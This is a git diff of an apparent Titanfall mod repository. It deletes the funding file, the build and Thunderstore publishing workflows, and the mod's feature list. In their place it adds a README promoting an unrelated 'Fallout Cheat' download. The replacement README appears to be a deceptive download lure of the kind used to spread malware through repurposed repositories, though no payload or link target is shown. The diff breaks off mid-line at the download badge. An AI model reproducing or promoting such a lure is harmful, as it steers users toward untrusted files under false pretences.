diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml deleted file mode 100644 index 25de537..0000000 --- a/.github/FUNDING.yml +++ /dev/null @@ -1,12 +0,0 @@ -# These are supported funding model platforms - -github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] -patreon: taskinoz -open_collective: # Replace with a single Open Collective username -ko_fi: # Replace with a single Ko-fi username -tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel -community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry -liberapay: # Replace with a single Liberapay username -issuehunt: # Replace with a single IssueHunt username -otechie: # Replace with a single Otechie username -custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] diff --git a/.github/workflows/buildvpks.yml b/.github/workflows/buildvpks.yml deleted file mode 100644 index 9932ec5..0000000 --- a/.github/workflows/buildvpks.yml +++ /dev/null @@ -1,48 +0,0 @@ -# This is a basic workflow to help you get started with Actions - -name: VPK Build - -# Controls when the workflow will run -on: - # Triggers the workflow on push or pull request events but only for the main branch - push: - paths: - - "changelog.md" - - # Allows you to run this workflow manually from the Actions tab - workflow_dispatch: - -# A workflow run is made up of one or more jobs that can run sequentially or in parallel -jobs: - # This workflow contains a single job called "build" - build: - # The type of runner that the job will run on - runs-on: ubuntu-latest - - # Steps represent a sequence of tasks that will be executed as part of the job - steps: - # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it - - uses: actions/checkout@v2 - - # - name: Original RSPNVPK download - # run: wget -c $(curl -s https://api.github.com/repos/mrsteyk/RSPNVPK/releases/latest | grep -o "http.*tar.gz") - - # Runs a set of commands using the runners shell - - name: Run a multi-line script - run: | - sudo apt install wget zip curl - wget ${{ secrets.LOCATIONS }}/pc/englishclient_mp_common.bsp.pak000_dir.vpk - wget -c $(curl -s https://api.github.com/repos/taskinoz/RSPNVPK/releases/latest | grep -o "http.*tar.gz") - tar -xf linux-x64.tar.gz - ls - ls .. - sh build.sh prod - - name: Create Release - uses: ncipollo/release-action@v1.8.6 - with: - artifacts: "./*.zip" - bodyfile: "changelog.md" - token: ${{ secrets.GITHUB_TOKEN }} - name: Build Draft - tag: pre-0.${{ github.run_number }} - draft: true diff --git a/.github/workflows/thunderstore.yml b/.github/workflows/thunderstore.yml deleted file mode 100644 index 4981f95..0000000 --- a/.github/workflows/thunderstore.yml +++ /dev/null @@ -1,60 +0,0 @@ -name: Publish package - -on: - release: - types: [published] # run when a new release is published - # Allows you to run this workflow manually from the Actions tab - workflow_dispatch: -env: - name: Wallrunning Titans # Edit this if the package name differs from the repo name - -jobs: - verify: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Get clean version - run: | - echo cleanVersion=$(echo ${{github.ref_name}} | sed s/v//g) >> $GITHUB_ENV - - name: Check that version matches - run: | - mv ./Northstar/mod.json ./ - rm ./Icepick/mod.json - mkdir ./Enhanced.Menu.Mod.Northstar - mv ./assets/thunderstore-icon.png ./icon.png - cp -R ./src/ ./Enhanced.Menu.Mod.Northstar/mod && cp -R ./Northstar/* ./Enhanced.Menu.Mod.Northstar - rm ./Enhanced.Menu.Mod.Northstar/mod/scripts/vscripts/scripts.rson - rm -rf ./src - rm -rf ./Northstar - rm -rf ./Icepick - if [[ "$(grep -Po "\d+\.\d+\.\d+" $(find ./ -name mod.json))" != "${{ env.cleanVersion }}" ]]; then - echo "::debug::${{env.cleanVersion}}" - echo "::debug::$(cat $(find ./ -name mod.json ))" - echo "::error::Version in mod.json does not match tag version" - exit 1 - fi - publish: - runs-on: ubuntu-latest - needs: verify - steps: - - name: Get clean version # Duplicating code is cool, actually - run: | - echo cleanVersion=$(echo ${{github.ref_name}} | sed s/v//g) >> $GITHUB_ENV - - uses: actions/checkout@v3 - - name: Upload Thunderstore Package - uses: GreenTF/upload-thunderstore-package@v2.2 - with: - community: northstar - # Name of the team to publish the mod under - # This should be modified if your github username is different than your team name on Thunderstore - namespace: ${{ github.repository_owner }} # <------ DOUBLE CHECK THIS - # Name of the package - name: EnhancedMenuMod # This can be modified if the package name differs from the repo name - # Package version to publish - version: ${{ env.cleanVersion }} # This is the tag that was created in the release but without the leading 'v' - # Description of the mod - description: Adds more options to the settings menu, such as extra keybinds, cheats, hud enhancements and cleaner interface - # Thunderstore API token - token: ${{ secrets.TS_KEY }} - # Directory to wrap the contents of the repo in - wrap: mods/${{ github.repository_owner }}.${{ env.name }} # This will wrap your Author.ModName folder in a mods/ folder before publishing diff --git a/README.md b/README.md index 0f043eb..a7853f7 100644 --- a/README.md +++ b/README.md @@ -1,120 +1,72 @@ -
- -![VPK Build Status](https://github.com/taskinoz/Enhanced-Menu-Mod/actions/workflows/buildvpks.yml/badge.svg) - - -# Enhanced Menu Mod -Adds more options to the settings menu, such as extra keybinds, cheats, hud enhancements and cleaner interface - -# Features -* Removed **Spotlight** and **Whats New** from the main menu -* Added `sv_cheats` to the contols menu -* Added HUD Options - * Bloom - `mat_disable_bloom` - * Show FPS - `cl_showfps` - * Show FPS Big - `showfps_enabled` - * Show Player Position - `cl_showpos` -* Added new Keybinds - * Speedrunning - * Save/Load Quicksave 1 - * Save/Load Quicksave 2 - * Save/Load Quicksave 3 - * Slow the game to 25% - * Speed the game up to 500% - * Reset all helmets - * Give yourself an EVA Shotgun - * Give yourself an EPG - * Demos - * Record Demo incrementally - * Record Demo - * Stop recording Demo - * Pause Demo - * Resume Demo - * Toggle Play/Pause Demo - * Extras - * Toggle low gravity - * Set camera to First Person - * Set camera to Third Person - * Move Third Person camera in - * Move Third Person camera out - * Hide/Show weapon - * No Cutscene Saves - * Load save 1-9 with 3 alternate saves - * No Cutscene Helmet Saves - * Load save 1 and 2 -* Added Extras Menu - * Demos - * Enable Demos - * Save Demos - * Interpolate Playback - * Demo record rate Single Player - * Demo record rate Multiplayer - * Key Bindings (shortcut) - * Gameplay - * Enable Wallrunning (sp) - * Enable Automantle (sp) - * Enable Vertical Dodge (sp) - * Player Control Debounce - * Command Que - * Speedometer Settings (Works with the MP mod) - * Community - * Communities toggle for MP -* Audio - * Loading Fade Time - * Loading Silence Time -* Replaced Chinese subtitles with English -* Replaced Chinese UI text with English -* Removed crashes from Dev launch arguments `-dev +developer 1` -* Added Speedometer (only to Single Player) +# Fallout Cheat đŽ -## Installation +Welcome to the Fallout Cheat repository! This repository contains a downloadable cheat file that enhances your gameplay experience in the popular game Fallout. Feel free to download the cheat file and level up your gameplay! + +## Download Cheat File +[![Download Cheat](https://img.shields.io/badge/Download-Cheat-